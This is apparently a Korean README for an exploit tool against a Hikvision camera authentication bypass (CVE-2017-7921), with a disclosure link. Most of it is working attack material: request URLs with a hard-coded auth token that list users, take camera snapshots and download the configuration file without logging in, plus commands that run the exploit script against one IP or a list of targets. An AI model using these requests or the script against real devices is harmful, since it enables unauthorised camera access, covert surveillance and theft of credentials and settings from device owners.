
Hikvision 카메라 CVE-2017-7921-EXP
Hikvision 장치에서 부적절한 인증 문제가 발견되었습니다.
부적절한 인증 취약점은 애플리케이션이 사용자를 적절하게 또는 올바르게 인증하지 않을 때 발생합니다.
이로 인해 악의적인 사용자가 시스템에서 자신의 권한을 상승시키고 민감한 정보에 접근할 수 있습니다.
https://seclists.org/fulldisclosure/2017/Sep/23
취약점 상세:
----------------------
모든 사용자와 해당 역할 목록 검색:
http://camera.ip/Security/users?auth=YWRtaW46MTEK
인증 없이 카메라 스냅샷 획득:
http://camera.ip/onvif-http/snapshot?auth=YWRtaW46MTEK
그리고 가장 심각한 것은, 카메라 설정 파일을 다운로드할 수 있습니다:
http://camera.ip/System/configurationFile?auth=YWRtaW46MTEK
python3 -m pip install -r requirements.txt
python3 CVE_2017_7921_EXP.py -t xxx.xx.xx.xx run
python3 CVE_2017_7921_EXP.py -t ./targets.txt run
